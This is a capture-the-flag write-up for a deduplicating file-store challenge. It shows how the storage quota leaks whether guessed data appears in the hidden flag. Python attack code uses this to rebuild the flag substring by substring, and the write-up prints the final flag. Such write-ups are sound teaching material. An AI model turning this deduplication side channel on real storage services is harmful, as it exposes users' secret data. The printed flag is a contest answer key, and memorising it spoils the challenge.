We stored our flag on this platform, but forgot to save the id. Can you help us restore it?
Analysis
When running the program, we have 4 options.
➜ Google ./filestore.py
Welcome to our file storage solution.
Menu:
- load
- store
- status
- exit
Let's first look at the source code for saving and loading files.
First, all data is stored in blob:
```python
# It's a tiny server...
blob = bytearray(2**16)
files = {}
used = 0
```
The storing of data works through deduplication. I've added some comments to the source code to make it more understandable:
```python
# Use deduplication to save space.
def store(data):
    nonlocal used
    MINIMUM_BLOCK = 16
    MAXIMUM_BLOCK = 1024
    part_list = []
    while data:
        prefix = data[:MINIMUM_BLOCK]
        ind = -1
        bestlen, bestind = 0, -1
        # Find the best 'matching' part of the blob
        while True:
            ind = blob.find(prefix, ind+1)
            if ind == -1: break
            length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
            if length > bestlen:
                bestlen, bestind = length, ind
        # Store the index of the match
        if bestind != -1:
            part, data = data[:bestlen], data[bestlen:]
            part_list.append((bestind, bestlen))
        # Append to the end
        else:
            part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
            blob[used:used+len(part)] = part
            part_list.append((used, len(part)))
            used += len(part)
            assert used <= len(blob)
    fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
    files[fid] = part_list
    return fid
```
Each 'file' is essentially represented by indices on the blob bytearray. If the new data is a duplicate of existing data, then no new data is stored onto the bytearray. Instead, the file is represented by an index pointing to the duplicated data.
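To make the representation concrete, here is a minimal sketch of how a file could be rebuilt from its list of `(offset, length)` pairs. The helper name `load_parts` and the toy blob are my own illustration, not the challenge's actual load code.

```python
def load_parts(blob: bytearray, part_list: list[tuple[int, int]]) -> bytes:
    """Rebuild a file by concatenating the (offset, length) slices of the blob."""
    return b"".join(bytes(blob[offset:offset + length]) for offset, length in part_list)


# Toy blob holding a single stored file, "testflag", at offset 0.
blob = bytearray(16)
blob[0:8] = b"testflag"

flag_file = [(0, 8)]   # the original file
dedup_file = [(0, 4)]  # "test", stored purely as a reference into existing bytes

print(load_parts(blob, flag_file))
print(load_parts(blob, dedup_file))
```

The second file occupies no bytes of its own: it only points into data that was already there.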
For the purposes of analysis, we can print the first few bytes of blob and the part_list.
Here's an example:
```
➜ Google ./filestore.py
Welcome to our file storage solution.
# Saving the flag into the blob
bytearray(b'testflag\x00\x00')
[(0, 8)]
Menu:
- load
- store
- status
- exit
store
Send me a line of data...
test
# Duplicated data at index 0
bytearray(b'testflag\x00\x00')
[(0, 4)]
Stored! Here's your file id:
tObXrn5TRAMIGl6W
```
Now, if we look at the status command, we see that the 'Quota' represents the used space in the blob bytearray. Since duplicated data was stored, the quota remains at 0.008kB.
This is very helpful to us - it allows us to check whether the data we are storing is a substring of the flag. If it is a substring, then the quota should remain the same. Otherwise, new data is stored and the used quota increases.
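The leak can be reproduced locally. The following is a simplified stand-in for the server's store logic, not the challenge code itself: `TinyStore` and `is_substring_of_stored` are hypothetical names, and the local `used` counter plays the role of the quota.

```python
import os


class TinyStore:
    """Local stand-in for the deduplicating store (simplified from the server's store())."""

    MINIMUM_BLOCK = 16
    MAXIMUM_BLOCK = 1024

    def __init__(self, size: int = 2**16):
        self.blob = bytearray(size)
        self.used = 0

    def store(self, data: bytes) -> None:
        while data:
            prefix = data[:self.MINIMUM_BLOCK]
            ind, bestlen, bestind = -1, 0, -1
            # Look for the longest match of `data` anywhere in the blob.
            while True:
                ind = self.blob.find(prefix, ind + 1)
                if ind == -1:
                    break
                window = bytes(self.blob[ind:ind + self.MAXIMUM_BLOCK])
                length = len(os.path.commonprefix([data, window]))
                if length > bestlen:
                    bestlen, bestind = length, ind
            if bestind != -1:
                data = data[bestlen:]  # deduplicated: nothing is written
            else:
                part, data = data[:self.MINIMUM_BLOCK], data[self.MINIMUM_BLOCK:]
                self.blob[self.used:self.used + len(part)] = part
                self.used += len(part)


def is_substring_of_stored(secret: bytes, guess: bytes) -> bool:
    """Use a fresh store per probe: a hit leaves `used` unchanged."""
    store = TinyStore()
    store.store(secret)
    before = store.used
    store.store(guess)
    return store.used == before


print(is_substring_of_stored(b"CTF{fake_flag}", b"fake"))
print(is_substring_of_stored(b"CTF{fake_flag}", b"fakX"))
```

A fresh store is created for every probe because a missed guess is itself written to the blob and would pollute later probes.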
Solving
This observation allows us to do a fairly trivial check for which characters are found in the flag. By sending each possible character and checking the quota value afterwards, we can confirm whether or not that character is found in the flag.
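A rough sketch of that character scan is below. `probe` is a hypothetical callable that stores one guess on a fresh connection and returns the text of the `status` response. `fake_probe` is a made-up offline stand-in, and its `Quota: ...kB/64.000kB` output format is an assumption based on the regex used later in this write-up.

```python
import re
import string
from typing import Callable


def parse_quota(status_text: str) -> str:
    """Pull the used-quota field out of a status response."""
    match = re.search(r'Quota: (.+)/64.000kB', status_text)
    if match is None:
        raise ValueError("no Quota line found")
    return match[1]


def find_valid_chars(probe: Callable[[str], str], baseline: str, alphabet: str) -> list[str]:
    """Keep every character whose probe leaves the quota at the baseline value."""
    return [c for c in alphabet if parse_quota(probe(c)) == baseline]


def fake_probe(guess: str, secret: str = "CTF{fake}") -> str:
    # Hypothetical stand-in for the server: the quota grows only on a miss.
    used = len(secret) + (0 if guess in secret else len(guess))
    return f"Quota: {used / 1000:.3f}kB/64.000kB\n"


baseline = parse_quota(fake_probe(""))  # quota with only the secret stored
alphabet = string.ascii_letters + string.digits + "{}_"
print(find_valid_chars(fake_probe, baseline, alphabet))
```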
But how do we get the flag? Brute-forcing every possible string over these valid characters would take too long. Instead, we first find all valid 2-character strings, then concatenate pairs of those to test 4-character candidates, and so on, doubling the length each round. Any substring of the flag splits into two shorter substrings of the flag, so candidates built from invalid halves never need to be tested. This eliminates most of the search space early on.
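```python
import re
from itertools import product

from pwn import remote  # assumption: remote()/recvuntil() are the pwntools API

# `valid` (list of valid single characters) and `target_quota` (quota string
# seen when nothing new is stored) are assumed to be defined by the earlier scan.
valid_n_chars = {1: valid}
LEN_FLAG = 26
i = 2
while i <= LEN_FLAG:
    result = []
    # Candidates of length i are pairs of valid strings of length i // 2
    permutations = [''.join(x) for x in product(valid_n_chars[i // 2], repeat=2)]
    num_permutations = len(permutations)
    count = 0
    for permutation in permutations:
        flag = ''.join(permutation)
        print(f"Trying {flag}...")
        # New connection for every guess
        conn = remote('filestore.2021.ctfcompetition.com', 1337)
        conn.recv()
        conn.send('store\r\n')
        conn.recv()
        conn.send(f'{flag}\r\n')
        conn.recvuntil('Menu')
        conn.send('status\r\n')
        received = conn.recvuntil('Menu').decode()
        match = re.search(r'Quota: (.+)/64.000kB', received)
        quota = match[1]
        # Unchanged quota means the guess was deduplicated against the flag
        if quota == target_quota:
            print(f"{flag} works!")
            result.append(flag)
        conn.close()
        if count % 10 == 0:
            print('Progress:', count / num_permutations)
        count += 1
    valid_n_chars[i] = result
    i *= 2
print('Valid results:', result)
```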
This eventually outputs all valid 16-character substrings of the flag.
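The doubling search can also be tried offline. This is a sketch under stated assumptions: `grow_candidates` is a hypothetical helper, the oracle is a plain Python substring test instead of the quota check, and the secret is a made-up 12-character string.

```python
from itertools import product
from typing import Callable


def grow_candidates(is_substring: Callable[[str], bool],
                    valid_chars: list[str],
                    max_len: int) -> dict[int, list[str]]:
    """Double the candidate length each round, keeping only strings the oracle accepts."""
    levels = {1: valid_chars}
    n = 2
    while n <= max_len:
        levels[n] = [a + b
                     for a, b in product(levels[n // 2], repeat=2)
                     if is_substring(a + b)]
        n *= 2
    return levels


secret = "CTF{d3dup3d}"  # made-up stand-in, not the real flag
chars = sorted(set(secret))
levels = grow_candidates(lambda s: s in secret, chars, len(secret))
for n, found in levels.items():
    print(n, len(found))
```

Each round only squares the number of surviving candidates from the previous round, which stays far below the number of all strings of that length.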
From here, we can reconstruct the flag: CTF{CR1M3_0f_d3dup1ic4ti0n}
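One way to do this reconstruction is to chain the substrings by their overlaps. The sketch below is an illustration rather than the exact steps used: `merge_overlapping` is a hypothetical helper, it assumes the flag starts with `CTF{` and that each piece has exactly one continuation, and the pieces are regenerated from the known flag purely to exercise the function.

```python
def merge_overlapping(pieces: list[str], start: str = "CTF{") -> str:
    """Chain equal-length pieces (length >= 2) that overlap in all but one character."""
    k = len(pieces[0])
    current = next(p for p in pieces if p.startswith(start))
    remaining = set(pieces) - {current}
    while True:
        # A continuation starts with the last k-1 characters of what we have so far.
        nxt = [p for p in remaining if p[:k - 1] == current[-(k - 1):]]
        if len(nxt) != 1:  # stop when there is no (or an ambiguous) continuation
            return current
        current += nxt[0][-1]
        remaining.discard(nxt[0])


flag = "CTF{CR1M3_0f_d3dup1ic4ti0n}"
# Stand-in for the script's output: every 16-character window, in reverse order.
pieces = [flag[i:i + 16] for i in range(len(flag) - 15)][::-1]
print(merge_overlapping(pieces))
```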